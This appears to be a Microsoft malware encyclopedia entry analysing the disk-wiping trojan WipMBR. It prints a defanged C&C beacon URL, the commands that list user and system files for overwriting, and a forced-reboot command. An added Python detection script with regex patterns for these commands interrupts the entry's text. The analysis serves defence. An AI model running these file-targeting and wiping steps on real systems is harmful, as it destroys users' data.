Trojan:Win64/WipMBR.gen!A
First posted on 22 August 2012.
Source: Microsoft
Aliases:
Trojan:Win64/WipMBR.gen!A is also known as Troj/MBRWipe-C (Sophos), KillFiles.RK (AVG), Trojan.EraseMBR.I (BitDefender), Trojan.KillMBR.165 (Dr.Web), Trojan.Win64.EraseMBR (Kaspersky), W64/DistTrack!comm (McAfee), Win-Trojan/Disttrack.155136 (AhnLab), WORM_WIPMBR.A (Trend Micro).
Explanation:
Trojan:Win64/WipMBR.gen!A is a trojan that overwrites your computer's MBR (master boot record) and other files, thus preventing you from accessing your operating system and using your computer. The trojan also connects to a remote host and may download arbitrary files.
Installation
Trojan:Win64/WipMBR.gen!A is dropped and run by Trojan:Win64/WipMBR.A on 64-bit operating systems, with one of the following file names:
- caclsrv.exe
- certutl.exe
- clean.exe
- ctrl.exe
- dfrag.exe
- dnslookup.exe
- dvdquery.exe
- event.exe
- extract.exe
- findfile.exe
- fsutl.exe
- gpget.exe
- iissrv.exe
- ipsecure.exe
- msinit.exe
- netx.exe
- ntdsutl.exe
- ntfrsutil.exe
- ntnw.exe
- power.exe
- rdsadmin.exe
- regsys.exe
- routeman.exe
- rrasrv.exe
- sacses.exe
- sfmsc.exe
- sigver.exe
- smbinit.exe
- wcscript.exe
Trojan:Win64/WipMBR.gen!A drops the following files:
%SystemRoot%\system32\netinit.exe
%SystemRoot%\system32\drivers\drdisk.sys
Note: %SystemRoot% refers to a variable location that is determined by the malware by querying the operating system. The default location for the SystemRoot folder for Windows 2000, XP, 2003, Vista and 7 is "C:\Windows".
Once dropped, the "netinit.exe" file's creation time, last access time and last write time are set to be the same as that of the system file "kernel32.dll". Trojan:Win64/WipMBR.gen!A schedules a job to run the file immediately.
The trojan installs the "drdisk.sys" file as a system device driver with the name "drdisk". This file is a clean driver from EldoS that provides "raw disk access".
Raw disk access means reading and writing a disk's sectors directly, bypassing the file system, so it reaches the underlying data on the disk - the actual ones and zeros that make up everything stored there.
Payload
Contacts remote host
Trojan:Win64/WipMBR.gen!A contacts a private C&C (command and control) server with the following URL:
hxxp://10.1.252.19/ajax_modal/modal/data.asp?mydata=<content/line count of "%SystemRoot%\inf\netft429.pnf">&uid=<local IP>&state=<system tick count>
This URL refers to a local IP address, which could indicate that a second machine is infected on the network and is acting as the C&C server.
Note: <system tick count> is a precise measurement of the number of milliseconds which have elapsed since your computer was last started.
Trojan:Win64/WipMBR.gen!A may download an additional file from the C&C server to the following location:
%SystemRoot%\Temp\filer<random number>.exe
Note: At the time of analysis, the C&C server was inaccessible.
Overwrites the MBR
Trojan:Win64/WipMBR.gen!A overwrites the MBR (master boot record). It also tries to overwrite data on non-system hard disk partitions and the files listed in f1.inf and f2.inf (see the Additional information section in this description) with part of a JPEG file.
Note: No image will be shown as the file is only part of a JPEG and not an actual image.
A non-system hard disk partition is a partition, or area, of a hard disk that does not contain system files or information related to the operation of your computer's operating system.
After overwriting the MBR and other files, it opens a command prompt and runs the command "shutdown -r -f -t 2", which forces your computer to shut down and restart after two seconds.
Additional information
Trojan:Win64/WipMBR.gen!A opens a command prompt and runs the following commands to get the list of files that it overwrites:
- dir "C:\Documents and Settings\" /s /b /a:-D 2>nul | findstr -i download 2>nul >f1.inf
- dir "C:\Documents and Settings\" /s /b /a:-D 2>nul | findstr -i document 2>nul >>f1.inf
- dir C:\Users\ /s /b /a:-D 2>nul | findstr -i download 2>nul >>f1.inf
- dir C:\Users\ /s /b /a:-D 2>nul | findstr -i document 2>nul >>f1.inf
- dir C:\Users\ /s /b /a:-D 2>nul | findstr -i picture 2>nul >>f1.inf
- dir C:\Users\ /s /b /a:-D 2>nul | findstr -i video 2>nul >>f1.inf
- dir C:\Users\ /s /b /a:-D 2>nul | findstr -i music 2>nul >>f1.inf
- dir "C:\Documents and Settings\" /s /b /a:-D 2>nul | findstr -i desktop 2>nul >f2.inf
- dir C:\Users\ /s /b /a:-D 2>nul | findstr -i desktop 2>nul >>f2.inf
- dir C:\Windows\System32\Drivers /s /b /a:-D 2>nul >>f2.inf
- dir C:\Windows\System32\Config /s /b /a:-D 2>nul | findstr -v -i systemprofile 2>nul >>f2.inf
- dir f1.inf /s /b 2>nul >>f1.inf
- dir f2.inf /s /b 2>nul >>f1.inf
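A defender-side check, added here as an example and not part of the Microsoft description: a small Python script that scans process-creation command lines (the sample lines below are constructed, modelled on the commands listed above) for the trojan's file-target enumeration (a recursive `dir /s /b /a:-D` redirected into f1.inf or f2.inf) and for its forced two-second restart, and rates a host by how many of the two behaviours it has shown.

```python
import re

# Constructed sample process-creation command lines (not real telemetry).
# Entries 0-2 mirror commands from this description; 3 and 4 are benign look-alikes.
SAMPLE_CMDLINES = [
    r'cmd.exe /c dir "C:\Documents and Settings\" /s /b /a:-D 2>nul | findstr -i download 2>nul >f1.inf',
    r'cmd.exe /c dir C:\Windows\System32\Drivers /s /b /a:-D 2>nul >>f2.inf',
    r'cmd.exe /c shutdown -r -f -t 2',
    r'cmd.exe /c dir C:\Users\ /s /b /a:-D',
    r'shutdown -r -t 600 -c "maintenance reboot"',
]

# Recursive, bare-format, files-only listing (/s /b /a:-D) whose output is
# redirected into f1.inf or f2.inf: the step that builds the overwrite list.
_FILE_LIST_RE = re.compile(
    r'\bdir\b.*/s\b.*/b\b.*/a:-d\b.*>>?\s*f[12]\.inf\b', re.IGNORECASE)

# Forced restart with a two-second delay (-r -f -t 2, flags in any order),
# which the trojan issues right after overwriting the MBR and files.
_FORCED_REBOOT_RE = re.compile(
    r'\bshutdown\b(?=.*\s[-/]r\b)(?=.*\s[-/]f\b)(?=.*\s[-/]t\s+2\b)',
    re.IGNORECASE)

def classify(cmdline):
    """Return the WipMBR behaviour tags that one command line matches."""
    tags = []
    if _FILE_LIST_RE.search(cmdline):
        tags.append("wipmbr_file_target_list")
    if _FORCED_REBOOT_RE.search(cmdline):
        tags.append("wipmbr_forced_reboot")
    return tags

def scan(cmdlines):
    """Return (index, tags) for every command line that matched a tag."""
    hits = []
    for i, line in enumerate(cmdlines):
        tags = classify(line)
        if tags:
            hits.append((i, tags))
    return hits

def assess(cmdlines):
    """Rate a host: both behaviours seen -> 'high', one -> 'medium', none -> 'none'."""
    seen = {tag for _, tags in scan(cmdlines) for tag in tags}
    if len(seen) == 2:
        return "high"
    return "medium" if seen else "none"
```

Feed `scan()` the command-line field of your process-creation events (for example Sysmon event ID 1) for one host; `assess()` on the same list gives a per-host confidence that this destructive sequence ran.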
It stores this list in the following files, in the same location as Trojan:Win64/WipMBR.gen!A:
- f1.inf
- f2.inf
Related encyclopedia entries
- Trojan:Win64/WipMBR.A
Analysis by Shawn Wang
Last update 22 August 2012